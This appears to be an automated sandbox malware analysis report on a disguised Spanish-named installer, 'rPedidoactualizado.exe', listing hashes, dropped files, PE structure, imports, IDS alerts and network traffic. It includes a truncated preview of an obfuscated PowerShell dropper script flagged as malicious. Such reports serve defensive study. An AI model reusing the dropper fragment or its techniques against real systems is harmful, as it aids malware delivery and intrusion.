                                        STlUEqhwpx.exeGet hashmaliciousQuasarBrowse
                                        • 149.154.167.220
                                        EUYIlr7uUX.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        37f463bf4616ecd445d4a1937da06e19T2bmenoX1o.exeGet hashmaliciousLummaC, VidarBrowse
                                        • 216.58.206.65
                                        • 216.58.206.46
                                        ArT23Ix6Ox.exeGet hashmaliciousUnknownBrowse
                                        • 216.58.206.65
                                        • 216.58.206.46
                                        cqKYl7T4CR.exeGet hashmaliciousUnknownBrowse
                                        • 216.58.206.65
                                        • 216.58.206.46
                                        ArT23Ix6Ox.exeGet hashmaliciousUnknownBrowse
                                        • 216.58.206.65
                                        • 216.58.206.46
                                        cqKYl7T4CR.exeGet hashmaliciousUnknownBrowse
                                        • 216.58.206.65
                                        • 216.58.206.46
                                        SecuriteInfo.com.FileRepMalware.12793.28433.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 216.58.206.65
                                        • 216.58.206.46
                                        Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                        • 216.58.206.65
                                        • 216.58.206.46
                                        WiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                        • 216.58.206.65
                                        • 216.58.206.46
                                        out.exeGet hashmaliciousVidarBrowse
                                        • 216.58.206.65
                                        • 216.58.206.46
                                        PEDIDO-144848.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 216.58.206.65
                                        • 216.58.206.46
                                        No context
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):14744
                                        Entropy (8bit):4.992175361088568
                                        Encrypted:false
                                        SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                        MD5:A35685B2B980F4BD3C6FD278EA661412
                                        SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                        SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                        SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Users\user\Desktop\rPedidoactualizado.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):478461
                                        Entropy (8bit):1.2475162534380173
                                        Encrypted:false
                                        SSDEEP:1536:R/xRunV7hsXgfAfBz7Wr/dIoM1mI/hqrJPNOeam:1SV7bYfp7QIT41N2
                                        MD5:BF4A008DC0B6586BA5DC8205FFC7DF72
                                        SHA1:0D84F9EF7D25DAB9667BEA1FCD6892621B5BD404
                                        SHA-256:497253D655FA9BDCDF3058A1092EA37C5954FB532ED86F04DE1C7121784D1EA7
                                        SHA-512:71EDACB5E8E860D1D936F152C20609DEAD0E9F388099F2DD33D41DDBF2EA1AFB58A2C6BFFC484C2DF7565AF9C294F2C0D2F86AAA4740F19FDE1FE8A8B821F78B
                                        Malicious:false
                                        Preview:.._.`...............................................i.........................................`.........f...................Q................................M.....r..............^....................................4......................................................................O...=.h.........................q..X...............S........................|..........................................................................................................r.).....................a......................W...................X...........................................................M.. ...............3...........<....y........x....I..............................I~..................o..........................................@..........................................D..............................................................Q.....................................................c.......i.......................................................................)...............,...
                                        Process:C:\Users\user\Desktop\rPedidoactualizado.exe
                                        File Type:ASCII text, with very long lines (3251), with CRLF, LF line terminators
                                        Category:dropped
                                        Size (bytes):55589
                                        Entropy (8bit):5.3395961193086965
                                        Encrypted:false
                                        SSDEEP:768:QAoFdvSL7MvM2z7oL9J6Hugxtzh95SOcntjnW2e/tRG1+uYZmB875K0xU3l:qFdvShLnUugxtt9unk4YmBcw7l
                                        MD5:D418CF28E87B5EDF54FF46E06525D8AD
                                        SHA1:7BF3FA4495E0A54065BE917A14018EA057C76991
                                        SHA-256:7EB26D39AE073029CD5248C90835745BAAD3FB0BEA886092536E3E78BB157B77
                                        SHA-512:9A504051B8A48DBC9BD8B4E4E3281928FB84B4443C5F4398DC37397CE9E5C6AE63B04DC56F30BD0FB019157639C1882903231DCF80A356164C85EBDD1EF82E3E
                                        Malicious:true
                                        Preview:$Hamantasch=$Tvrretning;..<#Fireworms Tinwoman Taxiflyvningens Tsedrengene Krydsogtvrser #>..<#Alderdomshjemmene Kostaldes Systempartneren Brintionernes Storyboard Melioratively #>..<#Judicative Bardunernes Underslbenes Delegationernes Mdestederne Snagbush Gyrostabilizer #>..<#Aluminiumstrykkene Cobewail Prosiest #>..<#Hault Underinddele Crocodility Mases Basiliscine Fartberuset Hjttalerdrift #>..<#bolstrene Prunella Admiralsuniformernes Vejbane Dubberen #>...$Enhedselementer = @'.Luder.Batbo$,rkssCStvleo KneenAr.ads Nonwe repecPippiuCrypttRa.sii SarkvTrlleeChok,sFokke2Youth4motiv0Klaner UndioOverbcNyhedh noxaStadsnIntrutNondu=Chrom$ExubeGDott.l Augua commsNonimfPranciSkarnbP anieLackwrPodoseSizinnGrammsS mal;Legem.LimacfMech.uForvenAd,atc,eleft vinei sko.oSprinnSnipt PrelaUMinusnVoc tbBerlieR,gnsl A priskrlee RedovKont aRomanbBogenlRebiaeAdminn Sty,eWashtsS,yrksFigen Indsb(Runds$SelvhFBerriuDr.chn Dolmk triktC rkui oncoArbejnAd essVermitRreddeRaasygFagstn eltoiDepaynUnveig LenseS.bl
                                        Process:C:\Users\user\Desktop\rPedidoactualizado.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):348419
                                        Entropy (8bit):7.657261397118454
                                        Encrypted:false
                                        SSDEEP:6144:xyb8l6jMLDiGZHflnNZxSyR/g7HublX6kMGaASNwgU5yZuNUt:Hl6jgDigflPbR/gCbl6OoNwgbZuN+
                                        MD5:F91262C1C4EED426F8350D887419D829
                                        SHA1:30159757E0411E591793E0398504EA61ED602963
                                        SHA-256:86BE99DEC5C5B03DA5FB5C1CC20A08696BCD88A4BAE0E1E4B89614DA6F66DA65
                                        SHA-512:F8FCA2001BAA9412DF83E223A2B5DF309A6C2D1379F82B3CF5F433F3F819CF661E37E9D7E6828BDA2202FF3D8E288CD03084F7883999A5E548EBCCDABD584F02
                                        Malicious:false
                                        Preview:.Q....-.@@@..............H......H..y.k.9.........P.lll..................)..33.........**.......................................................%................K.....FF..DD.....*.hh.........................................|||..=..............e.................................d..........................X.......................___.....SSSS.L.............\..~...++..............................U..............AA.........ll....I...ll....t..aaaaa............._...........;;.8...........Z.......$.11....II........................1................&....""...........................................///.......@........#.N...3.................R....5.......Y.................Z..xxx...............MMMMMM.........................P.O...F.2......```.....................oo........o......___..........C....AA.....$$.....h.................;;............ZZZZ.s.....@...........9..........\........&&&....//..D.d........88....(....#..........:.................}}}}}.S...............3..............M..........i.///////
                                        Process:C:\Users\user\Desktop\rPedidoactualizado.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):436009
                                        Entropy (8bit):1.2582605930205382
                                        Encrypted:false
                                        SSDEEP:768:hcdhFKp23vdhctpU19YKVceNXiajgLRY2hLsKf/LTWSs9D1bFuYRiQHlWrmcZE+t:T9ogp/vuFYha+YI6vuAYskfI2ByWSlq
                                        MD5:BA41A53F0CE12BDF6DDE858C1BB56E67
                                        SHA1:28CC8982281E9540750800B87B128ACF3E86E1B4
                                        SHA-256:0DDFC3936461A4A299A8B57D2EE5A4C11B057233AE905D2EBBB3641E4D9FD0CE
                                        SHA-512:77DDDF113CB001D489B2B4B39E5E953B03A76D72EEABAB0C82FFA8C8E1677755A75740A98D32871CB086AE65B0BD2EEE1319BD87C59CC98169ECBE60EE83348E
                                        Malicious:false
                                        Preview:.............;......................0........;.......................jh<.i....................................................B................O.(...................................................................................M....6....................c.............................:............A.........................#............@...............................................................................I...........\..........................k..................................H.............................................................................1.......l....?.[....................)*....~..........K..................................................D..................U.a............................C........................................................................=.............o.........................g...............1.......s..H................y.................t....[.....................i..........'p.................................g.....................$......
                                        Process:C:\Users\user\Desktop\rPedidoactualizado.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):356
                                        Entropy (8bit):4.234486179912683
                                        Encrypted:false
                                        SSDEEP:6:URWM/KBzGLFXivfRO5BViaS035LKlewERn62GFVhyzpFiqizhRc48RV1CnmMWIX+:UkgK4Lg3ROI0pLYT4Ahj3zKRV67WIXC7
                                        MD5:E514D8FDFF4A7AC568F2DED93DADB44E
                                        SHA1:DF81016124C8941F2D9F75B1BCB3D951F911626C
                                        SHA-256:687D18EA6077CE147AC2358AEF39F33119CC6C46A0A38C46AE444E75F595EE74
                                        SHA-512:E6E8734937C7F6CDF0FA3F25861A42CE31485555EF236B2922C0E90AA22C1B2D4BBB757AA13BF9C41948DAC261CF042565D2608074246000D479B143962B4CF3
                                        Malicious:false
                                        Preview:udkrystallisations kubong palisse duodesen raadighedsbelbene monoamino..hookman damperens varsel.endetarmsaabningens lection udvidelsestakts statometer diggers scandalized,ectocarpaceous carosella drattede stodderprinsen gingkoes,afvrgelsernes moravianized skotte.udsalgssteder fayal uafmrket svampelagenes mispronouncement forhaeng modemerne deskription..
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):692288
                                        Entropy (8bit):7.748225458784468
                                        Encrypted:false
                                        SSDEEP:12288:M2QJ9o2sW3B9o2G2/6SkwQtkmDnzCDJyVlk78A7RN9qqhyWjX53XO3:Mv9o2sW3B9oV2iSkwQKmKDd7FN9LhyaW
                                        MD5:E3CA439A218A7EEB9432B91FBF185559
                                        SHA1:5A55427C13737EA23773FF25476C0590C8EC9B4B
                                        SHA-256:A73A2597CBB4D6A76B2AB9D0664E79AD99D257AAB4683F7C68DD1321FA79F34B
                                        SHA-512:84135FA90268A569C1AFD2A9C0F6F29F69009028D3F646CBDE72AC7992E6F71D84C59288B1F55672693085CB6C2885A6808CD364692E36DB80E08CE9F311BC04
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 5%
                                        • Antivirus: Virustotal, Detection: 14%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:.....l3............@...........................?.....F.....@..........................................@=..|...........................................................................................................text....d.......d.................. ..`.rdata...............h..............@..@.data...8.9..........|..............@....ndata........:..........................rsrc....|...@=..~..................@..@................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):7.748225458784468
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:rPedidoactualizado.exe
                                        File size:692'288 bytes
                                        MD5:e3ca439a218a7eeb9432b91fbf185559
                                        SHA1:5a55427c13737ea23773ff25476c0590c8ec9b4b
                                        SHA256:a73a2597cbb4d6a76b2ab9d0664e79ad99d257aab4683f7c68dd1321fa79f34b
                                        SHA512:84135fa90268a569c1afd2a9c0f6f29f69009028d3f646cbde72ac7992e6f71d84c59288b1f55672693085cb6c2885a6808cd364692e36db80e08ce9f311bc04
                                        SSDEEP:12288:M2QJ9o2sW3B9o2G2/6SkwQtkmDnzCDJyVlk78A7RN9qqhyWjX53XO3:Mv9o2sW3B9oV2iSkwQKmKDd7FN9LhyaW
                                        TLSH:12E41219B250C1ABD6E5B13489A6DB58D877BCB49C62064B32D43BCDEE7EB106C4F807
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....
                                        Icon Hash:397d694151710f3c
                                        Entrypoint:0x40336c
                                        Entrypoint Section:.text
                                        Digitally signed:true
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:b34f154ec913d2d2c435cbd644e91687
                                        Signature Valid:false
                                        Signature Issuer:CN="Undersally Macusi ", E=hematologies@Gymnasts.ha, L=Paris 15, S=\xcele-de-France, C=FR
                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                        Error Number:-2146762487
                                        Not Before, Not After
                                        • 23/05/2024 04:37:18 23/05/2027 04:37:18
                                        Subject Chain
                                        • CN="Undersally Macusi ", E=hematologies@Gymnasts.ha, L=Paris 15, S=\xcele-de-France, C=FR
                                        Version:3
                                        Thumbprint MD5:99441D692D47D348DF593FEC580DF502
                                        Thumbprint SHA-1:D4C30401BEA9C2A77E7E5C55B2B820D93E8B6613
                                        Thumbprint SHA-256:7E8F9E425BA0161F88E44144109BEF33F4F4F1E9CD0AFC57A80C91AB7462D9C8
                                        Serial:5BB39523F95B3327628DF53C7CEFCC4D0549983A
                                        Instruction
                                        sub esp, 000002D4h
                                        push ebx
                                        push esi
                                        push edi
                                        push 00000020h
                                        pop edi
                                        xor ebx, ebx
                                        push 00008001h
                                        mov dword ptr [esp+14h], ebx
                                        mov dword ptr [esp+10h], 0040A2E0h
                                        mov dword ptr [esp+1Ch], ebx
                                        call dword ptr [004080A8h]
                                        call dword ptr [004080A4h]
                                        and eax, BFFFFFFFh
                                        cmp ax, 00000006h
                                        mov dword ptr [007A8A2Ch], eax
                                        je 00007FB09CBCA143h
                                        push ebx
                                        call 00007FB09CBCD3F5h
                                        cmp eax, ebx
                                        je 00007FB09CBCA139h
                                        push 00000C00h
                                        call eax
                                        mov esi, 004082B0h
                                        push esi
                                        call 00007FB09CBCD36Fh
                                        push esi
                                        call dword ptr [00408150h]
                                        lea esi, dword ptr [esi+eax+01h]
                                        cmp byte ptr [esi], 00000000h
                                        jne 00007FB09CBCA11Ch
                                        push 0000000Ah
                                        call 00007FB09CBCD3C8h
                                        push 00000008h
                                        call 00007FB09CBCD3C1h
                                        push 00000006h
                                        mov dword ptr [007A8A24h], eax
                                        call 00007FB09CBCD3B5h
                                        cmp eax, ebx
                                        je 00007FB09CBCA141h
                                        push 0000001Eh
                                        call eax
                                        test eax, eax
                                        je 00007FB09CBCA139h
                                        or byte ptr [007A8A2Fh], 00000040h
                                        push ebp
                                        call dword ptr [00408044h]
                                        push ebx
                                        call dword ptr [004082A0h]
                                        mov dword ptr [007A8AF8h], eax
                                        push ebx
                                        lea eax, dword ptr [esp+34h]
                                        push 000002B4h
                                        push eax
                                        push ebx
                                        push 0079FEE0h
                                        call dword ptr [00408188h]
                                        push 0040A2C8h
                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d40000x27cc0.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xa86a00x9a0.data
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x64000x6400eed0986138e3ef22dbb386f4760a55c0False0.6783203125data6.511089687733535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xa0000x39eb380x60009e0c528682cd2747c63b7ba39c2cc23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .ndata0x3a90000x2b0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x3d40000x27cc00x27e003ff3f9c979a556a14466f3e7fca5a16aFalse0.5468566320532915data6.448700520091383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0x3d44480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2851798178161599
                                        RT_ICON0x3e4c700xb85cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9977328587168404
                                        RT_ICON0x3f04d00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4055857345299953
                                        RT_ICON0x3f46f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.48091286307053943
                                        RT_ICON0x3f6ca00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6081144465290806
                                        RT_ICON0x3f7d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5914179104477612
                                        RT_ICON0x3f8bf00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6864754098360656
                                        RT_ICON0x3f95780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7044223826714802
                                        RT_ICON0x3f9e200x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.4371951219512195
                                        RT_ICON0x3fa4880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5173410404624278
                                        RT_ICON0x3fa9f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8156028368794326
                                        RT_ICON0x3fae580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.5255376344086021
                                        RT_ICON0x3fb1400x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.6418918918918919
                                        RT_DIALOG0x3fb2680x120dataEnglishUnited States0.5138888888888888
                                        RT_DIALOG0x3fb3880x11cdataEnglishUnited States0.6056338028169014
                                        RT_DIALOG0x3fb4a80xc4dataEnglishUnited States0.5918367346938775
                                        RT_DIALOG0x3fb5700x60dataEnglishUnited States0.7291666666666666
                                        RT_GROUP_ICON0x3fb5d00xbcdataEnglishUnited States0.648936170212766
                                        RT_VERSION0x3fb6900x2f0SysEx File - IDPEnglishUnited States0.4773936170212766
                                        RT_MANIFEST0x3fb9800x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                        DLLImport
                                        KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                        USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                        SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                        ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-08T03:32:34.090406+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549828216.58.206.46443TCP
                                        2024-10-08T03:32:40.146299+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549864158.101.44.24280TCP
                                        2024-10-08T03:32:41.240068+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549864158.101.44.24280TCP
                                        2024-10-08T03:32:41.815821+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549886188.114.96.3443TCP
                                        2024-10-08T03:32:43.458901+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549892158.101.44.24280TCP
                                        2024-10-08T03:32:46.415577+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549922188.114.96.3443TCP
                                        2024-10-08T03:32:47.604805+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549932188.114.96.3443TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 8, 2024 03:32:33.058677912 CEST49828443192.168.2.5216.58.206.46
                                        Oct 8, 2024 03:32:33.058717966 CEST44349828216.58.206.46192.168.2.5
